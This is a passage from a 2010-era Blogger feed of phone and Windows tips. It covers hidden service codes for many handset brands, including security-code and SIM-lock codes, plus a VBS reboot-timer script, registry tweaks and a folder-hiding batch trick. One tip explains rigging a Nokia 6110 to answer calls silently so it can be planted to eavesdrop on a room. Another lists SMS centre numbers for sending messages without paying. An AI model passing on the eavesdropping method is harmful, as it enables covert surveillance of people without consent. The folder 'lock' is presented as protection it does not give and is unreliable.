*2767*2878#&lt;br /&gt;Battery state: * # 9 9 9 8 * 2 2 8 #&lt;br /&gt;Alarm beeper: *#9998*289#&lt;br /&gt;Vibra test: *#9998*842#&lt;br /&gt;&lt;br /&gt;.:: Dancall ::.&lt;br /&gt;&lt;br /&gt;IMEI number: * # 0 6 #&lt;br /&gt;Software version: * # 9 9 9 9 #&lt;br /&gt;&lt;br /&gt;.:: Philips ::.&lt;br /&gt;&lt;br /&gt;*#3333*# Displays the blocking list.&lt;br /&gt;*#7489*# Displays the security code.&lt;br /&gt;*#06# Displays the IMEI number.&lt;br /&gt;*#8377*# Displays the SW info.&lt;br /&gt;&lt;br /&gt;.:: Panasonic ::.&lt;br /&gt;&lt;br /&gt;Panasonic gd90 gd93&lt;br /&gt;&lt;br /&gt;*#9999# SW - Type the code on switch on , during network seek&lt;br /&gt;-Vers. SW and production code&lt;br /&gt;Enable ringing and vibration contemporarily&lt;br /&gt;Enable vibration with # then increase volume with "tone menu "&lt;br /&gt;&lt;br /&gt;Panasonic gd70&lt;br /&gt;&lt;br /&gt;*#9999# SW - Type the code on switch on , during network seek&lt;br /&gt;-Vers. SW and production code&lt;br /&gt;Enable ringing and vibration contemporarily&lt;br /&gt;Enable vibration with # then increase volume with "tone menu "&lt;br /&gt;&lt;br /&gt;.:: Acer ::.&lt;br /&gt;&lt;br /&gt;Acer V 750&lt;br /&gt;&lt;br /&gt;*#400# Display Adc/ Set Cal-Value -&lt;br /&gt;*#402# Set LCD Contrast&lt;br /&gt;*#403# Display Errors Info&lt;br /&gt;*#300# Display Info Hw &amp; Sw&lt;br /&gt;*#301# Menu Test&lt;br /&gt;*#302# Menu Acoustics&lt;br /&gt;*#303# (Settings saved) Set English language?&lt;br /&gt;*#307# Menu Engineering&lt;br /&gt;*#311# Reset Phone Code - [ Also reset Security Codes ! ]&lt;br /&gt;*#330# (Execute not success) [ unknown ]&lt;br /&gt;*#331# (Service deactivated) [ unknown ]&lt;br /&gt;*#332# (Service unavailable)[ unknown ]&lt;br /&gt;*#333# (Execute not success)[ unknown ]&lt;br /&gt;*#351# (Service unavailable) [ unknown ]&lt;br /&gt;*#360# (Invalid input)[ unknown ]&lt;br /&gt;*#361# (Invalid input) [ unknown ]&lt;br /&gt;*#362# (Invalid input) [ unknown ]&lt;br /&gt;*#363# (Invalid input) [ unknown ]&lt;br /&gt;&lt;br /&gt;.:: Genie ::.&lt;br /&gt;&lt;br /&gt;Genie DB &lt;br /&gt;&lt;br /&gt;*#06# IMEI.&lt;br /&gt;*#2254*# Near Cell Mode.&lt;br /&gt;&lt;br /&gt;For every received BTS will be displayed :&lt;br /&gt;Current channel and 2 channel levels&lt;br /&gt;&lt;br /&gt;*#06# IMEI&lt;br /&gt;*#2558# time of network connection ( D/H/M )&lt;br /&gt;*#2562# Fores reconnection to network&lt;br /&gt;!!!*#7489# Dispalys and modify phones' security code!!!&lt;br /&gt;!!!*#3377# SIM lock information !!!&lt;br /&gt;*#7378# SIM card Informations : supported phase name and tipe&lt;br /&gt;*#7693# Enable/disable "Sleep Mode"&lt;br /&gt;*#8463# State of "Sleep Mode"&lt;br /&gt;*#2255# Debug Call Mode enable/disable&lt;br /&gt;*#3333*# Displays the blocking list.&lt;br /&gt;*#7489*# Displays the security code&lt;br /&gt;*#06# Displays the IMEI number&lt;br /&gt;*#8377*# Displays the SW info.&lt;br /&gt;&lt;br /&gt;.:: NEC ::.&lt;br /&gt;&lt;br /&gt;NEC db2000 &lt;br /&gt;&lt;br /&gt;*#2820# software vers.&lt;br /&gt;IMEI *#06#&lt;br /&gt;Reset *73738# (send?)&lt;br /&gt;SP Lock info:&lt;br /&gt;* # 3210 # (send?)&lt;br /&gt;Network barring info : *#8140# (send?)&lt;br /&gt;( it could harm your phone )&lt;br /&gt;SIM lock it could harm your phone )&lt;br /&gt;*#4960 # (send?) -Inquiry * 4960 * password * password # (send?) lock&lt;br /&gt;#4960* password # (send?) unlock&lt;br /&gt;[password] [8 digits]&lt;br /&gt;Net Lock&lt;br /&gt;*#7320# (send?) -Inquiry * 7320 * password * password # (send?) lock&lt;br /&gt;#7320* password # (send?) unlock&lt;br /&gt;[password] [ 8 digits]&lt;br /&gt;Net Lock 2:&lt;br /&gt;*#2220# (invio) - Inquiry * 2220 * password * password # (send?) lock&lt;br /&gt;#2220* password # (invio?)unlock&lt;br /&gt;[password] [8 digits]&lt;br /&gt;Unlock subnetwork&lt;br /&gt;*#1110# (send?) - inquiry * 1110 * password * password # (send?) lock&lt;br /&gt;#1110* password # (send?) unlock&lt;br /&gt;[password] [nï¿½ 8 cifre]&lt;br /&gt;( it could harm your phone )&lt;br /&gt;&lt;br /&gt;.:: Trium ::.&lt;br /&gt;&lt;br /&gt;Trium Geo/Geo @ - Astral - Cosmo -Aria&lt;br /&gt;&lt;br /&gt;Enter the menu and type *&lt;br /&gt;A new menu will be displayed :&lt;br /&gt;Application : SW version and battery's voltage&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Trium Galaxy&lt;br /&gt;Push * and type 5806: Production date and SW version&lt;br /&gt;&lt;br /&gt;.:: Telit ::.&lt;br /&gt;&lt;br /&gt;Telit GM 810 &lt;br /&gt;&lt;br /&gt;MONITOR - technical menu - : type ++++ and push OK.&lt;br /&gt;Adiacent cells list : # and *&lt;br /&gt;Now if you push OK the phone displays battery ' s voltage and temperature&lt;br /&gt;&lt;br /&gt;.:: Sagem ::.&lt;br /&gt;&lt;br /&gt;Sagem MC959/940&lt;br /&gt;&lt;br /&gt;Select commands' menu and push *&lt;br /&gt;Displays a new menu' :&lt;br /&gt;Appli : software vers. and battery's voltage&lt;br /&gt;Eprom&lt;br /&gt;Sim Lock&lt;br /&gt;Test LCD: display test , green/red and vibration&lt;br /&gt;&lt;br /&gt;Sagem MC920&lt;br /&gt;&lt;br /&gt;Select commands' menu and push *&lt;br /&gt;Displays 5 new menus :&lt;br /&gt;&lt;br /&gt;1 APPLI&lt;br /&gt;VERSION ( SW)&lt;br /&gt;BATTERY (voltage )&lt;br /&gt;2 PROM (IMEI)&lt;br /&gt;3!!! SIM LOCK (10 digits code requested ) !!!&lt;br /&gt;4- NETWORK (returns : OPTION NOT AVAILABLE)&lt;br /&gt;5- TEST LCD&lt;br /&gt;SYMBOL 1 (LCD)&lt;br /&gt;SYMBOL 2 (test2 LCD)&lt;br /&gt;BLACK (all icons and carachters displayed )&lt;br /&gt;FOR PHOTO (welcome message and time )&lt;br /&gt;VIBRATOR (vibration test )&lt;br /&gt;&lt;br /&gt;.:: Sony ::.&lt;br /&gt;&lt;br /&gt;Sony CMD Z5/J5&lt;br /&gt;&lt;br /&gt;Vers. SW :&lt;br /&gt;Without SIM , switch on phone and type l *#7353273#&lt;br /&gt;&lt;br /&gt;.:: Eprom ::.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;!!! Sim Lock [10 digits code ] ( it could harm your phone )&lt;br /&gt;NETWORK : OPTION NOT AVAILABLE&lt;br /&gt;Test LCD: display test of the green/red leds and vibration&lt;br /&gt;Push * and type 4329 :enables/disables network monitor 1 (the same of MT35)&lt;br /&gt;Push * and type 621342 :enables/disables network monitor 2&lt;br /&gt;Push * and type 5807 : Serial Number Software Vers.&lt;br /&gt;Push * and type 936505: IMEI -- Software Vers.&lt;br /&gt;TPush * and type 547 : Test serial Data Cable DISPLAYS :"Testmode"&lt;br /&gt;Push * and type 362628: ISMI BLOCK (UNKNOWN)&lt;br /&gt;Push * and type 476989: NS BLOCK (UNKNOWN)&lt;br /&gt;Push * and type 482896:CP BLOCK (UNKNOWN)&lt;br /&gt;Push * and type 787090: ? BLOCK (UNKNOWN)&lt;br /&gt;Push * and type 787292 : block current network&lt;br /&gt;!!! Push * and type 967678: SP LOCK!!!&lt;br /&gt;Push * and type 850696:Warm Start ( ENABLE/DISABLE)&lt;br /&gt;Push * and type 3926 : Swicth off phone&lt;br /&gt;Push * and type 5806: Production date and SW version&lt;br /&gt;&lt;br /&gt;.:: Motorola ::.&lt;br /&gt;&lt;br /&gt;Motorola V3688 &lt;br /&gt;&lt;br /&gt;IMEI *#06#&lt;br /&gt;Enhanced Full Rate Codec EFR&lt;br /&gt;Enable EFR : [][][] 119 [] 1 [] OK.&lt;br /&gt;disable EFR : [][][] 119 [] 0 [] OK&lt;br /&gt;&lt;br /&gt;.:: Tips and Tricks ::.&lt;br /&gt;&lt;br /&gt;Send an E-mail from your GSM&lt;br /&gt;&lt;br /&gt;From your telephone you can send an email to whichever E-mail customer of the Internet network.&lt;br /&gt;&lt;br /&gt;The e-mail will be sent to the maximum of within an hour from the reception.&lt;br /&gt;&lt;br /&gt;The sended message will contain in luminosity the telephone number of the sender. &lt;br /&gt;&lt;br /&gt;In order for sending e-mail, send an SMS with this syntax (always separated by spaces):&lt;br /&gt;&lt;br /&gt;EMA name@domain text-of-your-email&lt;br /&gt;&lt;br /&gt;Example: in order to send an email to john@doe.com , do the following:&lt;br /&gt;&lt;br /&gt;EMA john@doe.com text-of-your-email&lt;br /&gt;&lt;br /&gt;if your phone cant print @ replace it with a !&lt;br /&gt;&lt;br /&gt;EMA johon!doe.com text-of-your-email&lt;br /&gt;&lt;br /&gt;And then send this message to the folloving number: +39 338 8641732&lt;br /&gt;&lt;br /&gt;Free SMS Center numbers &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;From your telephone you can send SMS messages of 160 char. max. to another GSM phone&lt;br /&gt;&lt;br /&gt;Your message will be sent through an SMS Center (usually the one that gave your provider)&lt;br /&gt;&lt;br /&gt;You pay a little fee depending of your provider, BUT YOU WILL HAVE TO PAY something&lt;br /&gt;&lt;br /&gt;In order for sending SMS without paying anything, you got to change your SMS Center number with these one&lt;br /&gt;&lt;br /&gt;+491722270300 or +358405202999 or +352021100003&lt;br /&gt;&lt;br /&gt;Codes (that they dont tell you in the manual)&lt;br /&gt;&lt;br /&gt;To check the IMEI (International Mobile Equipment Identity) type: *#06#&lt;br /&gt;&lt;br /&gt;Information you get from the IMEI:&lt;br /&gt;XXXXXX XX XXXXXX X&lt;br /&gt;TAC FAC SNR SP&lt;br /&gt;&lt;br /&gt;TAC = Type Approval Code (first 2 digits = country code).&lt;br /&gt;&lt;br /&gt;FAC = Final Assembly Code (For Nokia phonfiltered=10).&lt;br /&gt;&lt;br /&gt;SNR = Serial Number.&lt;br /&gt;&lt;br /&gt;SP = Spare (always SP=0).&lt;br /&gt;&lt;br /&gt;To check the phone's software (firmware revision information) type: *#0000# ( or for some phones outher then Nokia 61XX you can try *#model nummber# ex. for 8110 *#8110#)&lt;br /&gt;&lt;br /&gt;Information you can get from the phone's software version:&lt;br /&gt;V 3.14&lt;br /&gt;28-11-97&lt;br /&gt;NSE-3&lt;br /&gt;&lt;br /&gt;1st line: Software version.&lt;br /&gt;2nd line: The date of the software release. &lt;br /&gt;3nd line: Phone type, .&lt;br /&gt;&lt;br /&gt;Some versions and dates:&lt;br /&gt;&lt;br /&gt;V 3.14 28/11/97&lt;br /&gt;&lt;br /&gt;V4.33 11/03/98&lt;br /&gt;&lt;br /&gt;V 4.73 22/04/98&lt;br /&gt;&lt;br /&gt;V 5.24 14/9/98&lt;br /&gt;&lt;br /&gt;Pin-Out Diagram for the 6110 &lt;br /&gt;&lt;br /&gt;1 - VIN CHARGER INPUT VOLTAGE 8.4V 0.8A&lt;br /&gt;2 - CHRG CTRL CHARGER CONTROL PWM 32Khz&lt;br /&gt;3 - XMIC MIC INPUT 60mV - 1V&lt;br /&gt;4 - SGND SIGNAL GROUND&lt;br /&gt;5 - XEAR EAR OUTPUT 80mV - 1V &lt;br /&gt;6 - MBUS 9600 B/S&lt;br /&gt;7 - FBUS_RX 9.6 - 230.4 KB/S&lt;br /&gt;8 - FBUS_TX 9.6 - 230.4 KB/S&lt;br /&gt;9 - L_GND CHARGER / LOGIC GND&lt;br /&gt;&lt;br /&gt;Revealing Headphone and Car-Kit Menus&lt;br /&gt;&lt;br /&gt;Think about this: If you do these tricks the new menus can not be erased after the procedure. But it's not dangerous or harmful for your phone&lt;br /&gt;&lt;br /&gt;To enable the headset-function, you have to short-circuit the "3" and "4". After a short time there is "Headset" on the display Now, menu 3-6 is now enabled!&lt;br /&gt;&lt;br /&gt;To enable the carkit-function you have to short-circuit the "4" and "5". After a short time, "Car" is shown on the display and the menu 3-7 is enabled!!&lt;br /&gt;&lt;br /&gt;This Trick is for you how want to hear more then your supposed to ! &lt;br /&gt;&lt;br /&gt;If you short-circuit the left and the right contact with the middle contact ("3", "6" and "9") the Nokia Software hangs! The profile "Headset" will be activated. Before you do this, just active the "auto call receive" function in the headphone profile and set the ringing volume to "mute" Now you can use your phone for checking out what people are talking about in a room. Place the phone somewhere stratidic and call your phone! The phone receives the call without ringing and you can listen to what people are talking about! .....gr8...&lt;br /&gt;&lt;br /&gt;Serial numbers on your 6110&lt;br /&gt;&lt;br /&gt;For more info type: *#92702689#&lt;br /&gt;The first screen gives you the serial and IMEI number.&lt;br /&gt;Then there is the Date of Manufacture: ex. Made 1297&lt;br /&gt;Then there is the Purchasing Date: ex. Purchasing Date 0298&lt;br /&gt;Then there is the last Repair Date: ex. Repaired: 0000&lt;br /&gt;&lt;br /&gt;Note: you must turn off the phone to exit after this test, because of the last function, "transfer user data" which doesn't work as "standard"....You can use this mode only to transfer all Calender, Profile and Callers Group Information to another phone (eg. if you are replacing phone or configuring phones for use within your company or when a particular phone doesn't works correctly )&lt;br /&gt;&lt;br /&gt;Activating and deactivating EFR and HFR, on your 6110&lt;br /&gt;&lt;br /&gt;*3370# to activate Enhanced Full Rate - Makes calls sound better, but decreases the battery life by about 5%.&lt;br /&gt;&lt;br /&gt;#3370# to deactivate Enhanced Full Rate&lt;br /&gt;&lt;br /&gt;*4720# to activate Half Rate Mode - Drops call quality, but increases battery life by about 30%.&lt;br /&gt;&lt;br /&gt;#4720# to deactivate Half Rate Mode&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-6017745544754470747?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/6017745544754470747/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/01/all-phone-secrets-updated.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6017745544754470747'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6017745544754470747'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/01/all-phone-secrets-updated.html' title='All phone secrets   UPDATED'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-4477661731539875948</id><published>2010-01-16T20:16:00.000-08:00</published><updated>2010-01-16T20:16:23.390-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vista'/><title type='text'>Disable or Enable the Transient Multimon Manager (TMM) in Vista</title><content type='html'>Transient Multimon Manager (TMM) is a Microsoft Windows Vista operating system feature targeted at improving the user experience of connecting and disconnecting displays, particularly for the mobile user. This is the 2-3 second delay followed by a blank black screen as Vista searches for monitor changes when you startup Vista. &lt;br /&gt;If you do not use a external monitor for a mobile PC or multiple monitors on a desktop PC, then you can safely disable TMM. Do not disable TMM if you do.&lt;br /&gt;Disable or Enable the Transient Multimon Manager (TMM) in Vista&lt;br /&gt;&lt;br /&gt;1. Open the Start Menu.&lt;br /&gt;A) Click on All Programs, Accessories, System Tools, and Task Schedular.&lt;br /&gt;&lt;br /&gt;B) Go to step 2.&lt;br /&gt;&lt;br /&gt;OR&lt;br /&gt;&lt;br /&gt;1. Open the Control Panel (Classic View).&lt;br /&gt;A) Click on Administrative Tools -&gt; Computer Management.&lt;br /&gt;&lt;br /&gt;2. If prompted, click on Continue in the UAC prompt.&lt;br /&gt;&lt;br /&gt;3. In the left pane, expand Task Scheduler, Task Scheduler Library, Microsoft, Windows, and click on MobilePC. (See screenshot below)&lt;br /&gt;&lt;br /&gt;4. In the middle pane, right click on TMM.&lt;br /&gt;&lt;br /&gt;5. To Disable TMM -&lt;br /&gt;A) Click on Disable.&lt;br /&gt;&lt;br /&gt;B) Go to step 7.&lt;br /&gt;&lt;br /&gt;6. To Enable TMM -&lt;br /&gt;A) Click on Enable.&lt;br /&gt;NOTE: TMM is enabled by default in Vista.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7. Close Task Scheduler.&lt;br /&gt;&lt;br /&gt;8. Logoff and logon, or restart the computer to see the change&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-4477661731539875948?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/4477661731539875948/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/01/disable-or-enable-transient-multimon.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4477661731539875948'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4477661731539875948'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/01/disable-or-enable-transient-multimon.html' title='Disable or Enable the Transient Multimon Manager (TMM) in Vista'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3872742713219025659</id><published>2010-01-16T20:14:00.001-08:00</published><updated>2010-01-16T20:14:43.950-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='Vista'/><title type='text'>How to See What Your Boot Up Time is in Vista/XP</title><content type='html'>Just uploaded the .exe file for ur convenience:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/255352285/Reboot-Time.zip&lt;br /&gt;this file reboots ur PC and shows ur ReBoot time on restart,. Njoy.&lt;br /&gt;&lt;br /&gt;whenever u wanna out, u delete the exe file, lol &lt;br /&gt;&lt;br /&gt;OR&lt;br /&gt;&lt;br /&gt;1) Open your favorite text editor (notepad will do the job perfectly) and copy/paste the following script:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;em&gt;Option Explicit&lt;/em&gt;&lt;br /&gt;&lt;em&gt;On Error Resume Next&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Dim Wsh, Time1, Time2, Result, PathFile, MsgResult, MsgA, AppName, KeyA, KeyB, TimeDiff&lt;/em&gt;&lt;br /&gt;&lt;em&gt;MsgA = "Please close all running applications and click on OK."&lt;/em&gt;&lt;br /&gt;&lt;em&gt;KeyA = "HKEY_CURRENT_USER\Software\RestartTime\"&lt;/em&gt;&lt;br /&gt;&lt;em&gt;KeyB = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RestartTime"&lt;/em&gt;&lt;br /&gt;&lt;em&gt;AppName = "ReBoot-Time"&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Set Wsh = CreateObject("WScript.Shell")&lt;/em&gt;&lt;br /&gt;&lt;em&gt;PathFile = """" &amp;amp; WScript.ScriptFullName &amp;amp; """"&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Result = wsh.RegRead(KeyA &amp;amp; "Times")&lt;/em&gt;&lt;br /&gt;&lt;em&gt;if Result = "" then&lt;/em&gt;&lt;br /&gt;&lt;em&gt;MsgResult = Msgbox (MsgA, vbOKCancel, AppName)&lt;/em&gt;&lt;br /&gt;&lt;em&gt;If MsgResult = vbcancel then WScript.Quit&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Wsh.RegWrite KeyA &amp;amp; "Times", left(Time,8), "REG_SZ"&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Wsh.RegWrite KeyB, PathFile, "REG_SZ"&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Wsh.Run "cmd /c Shutdown -r -t 00", false, 0 &lt;/em&gt;&lt;br /&gt;&lt;em&gt;else&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Wsh.RegDelete KeyA &amp;amp; "Times"&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Wsh.RegDelete KeyA&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Wsh.RegDelete KeyB&lt;/em&gt;&lt;br /&gt;&lt;em&gt;TimeDiff = DateDiff("s",Result,left(Time,8))&lt;/em&gt;&lt;br /&gt;&lt;em&gt;MsgBox "Your computer reboots in " &amp;amp; TimeDiff &amp;amp; " seconds", VbInformation, AppName&lt;/em&gt;&lt;br /&gt;&lt;em&gt;end if&lt;/em&gt;&lt;br /&gt;wscript.Quit2) Save the file wherever you want on the same HDD (desktop for example) as ReBoot-Time.vbs (you can choose whatever name as far as the extension is ".VBS"&lt;br /&gt;&lt;br /&gt;once u click this file, u will reboot automatically and on reboot u will see the boot up time.. some thing lyk this:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If it isnt working, then renaming hasnt been done properly, see the note&lt;br /&gt;Pls note: u have to rar/zip the file to rename it from .txt to .vbs and then unrar/unzip to desktop&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3872742713219025659?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3872742713219025659/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/01/how-to-see-what-your-boot-up-time-is-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3872742713219025659'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3872742713219025659'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/01/how-to-see-what-your-boot-up-time-is-in.html' title='How to See What Your Boot Up Time is in Vista/XP'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-775039380660825579</id><published>2010-01-16T20:09:00.001-08:00</published><updated>2010-01-16T20:09:40.491-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><title type='text'>TuRn OfF uR Pc 1000 TiMeS fAsTeR</title><content type='html'>Go To Task Manager as u know u will get it by Ctrl + Alt + Delete= Task Manager&lt;br /&gt;&lt;br /&gt;No On ShutDown TaB Press Ctrl Key Hold it And Click on Turn Off&lt;br /&gt;&lt;br /&gt;Ur Pc Will Turn Off In 2 Seconds&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-775039380660825579?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/775039380660825579/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/01/turn-off-ur-pc-1000-times-faster.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/775039380660825579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/775039380660825579'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/01/turn-off-ur-pc-1000-times-faster.html' title='TuRn OfF uR Pc 1000 TiMeS fAsTeR'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1499242559908471800</id><published>2010-01-16T20:08:00.001-08:00</published><updated>2010-01-16T20:08:09.616-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Notepad'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>Lock a Folder Using Notepad</title><content type='html'>Consider you want to lock a folder named PICS in your D:\ , whose path is D:\PICS&lt;br /&gt;Now open the Notepad and type the following&lt;br /&gt;&lt;br /&gt;ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Where pics is your folder name. Save the text file as lock.bat in the same drive.&lt;br /&gt;Open another new notepad text file and type the following&lt;br /&gt;&lt;br /&gt;ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Save the text file as key.bat in the same drive.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Usage : &lt;br /&gt;&lt;br /&gt;To lock the pics folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.&lt;br /&gt;&lt;br /&gt;To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1499242559908471800?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1499242559908471800/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/01/lock-folder-using-notepad.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1499242559908471800'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1499242559908471800'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/01/lock-folder-using-notepad.html' title='Lock a Folder Using Notepad'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-5717398022078496628</id><published>2010-01-16T20:07:00.001-08:00</published><updated>2010-01-16T20:07:16.368-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><title type='text'>Trick - SHOW YOUR PC PENTIUM 5 OR MORE</title><content type='html'>SHOW YOUR PC PENTIUM 5 OR MORE&lt;br /&gt;&lt;br /&gt;GO TO START&gt;RUN&gt;TYPE REGEDIT&gt;HKEY_LOCAL_MACHINE&gt;HARDWARE&gt;DISCRIPTION&gt;SYSTEM&gt;CENTRAL&lt;br /&gt;&lt;br /&gt;PROCESSOR&gt;ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSOR NAME AND STRING AND THE CLICK ON&lt;br /&gt;&lt;br /&gt;MODIFY AND WRITE WHAT EVER YOU WANT OR NAME IT PENTIUM 5 OR MORE&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-5717398022078496628?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/5717398022078496628/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/01/trick-show-your-pc-pentium-5-or-more.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5717398022078496628'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5717398022078496628'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/01/trick-show-your-pc-pentium-5-or-more.html' title='Trick - SHOW YOUR PC PENTIUM 5 OR MORE'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-6295409734734829788</id><published>2010-01-16T20:06:00.001-08:00</published><updated>2010-01-16T20:06:17.337-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='registry entry'/><category scheme='http://www.blogger.com/atom/ns#' term='Notepad'/><title type='text'>Yahoo with multiple login IDs Without any Software</title><content type='html'>1. Open Note Pad&lt;br /&gt;2. Carefull copy the text given below and paste in it&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;REGEDIT4&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\yahoo\pager\Test]&lt;br /&gt;"Plural"=dword:00000001&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br 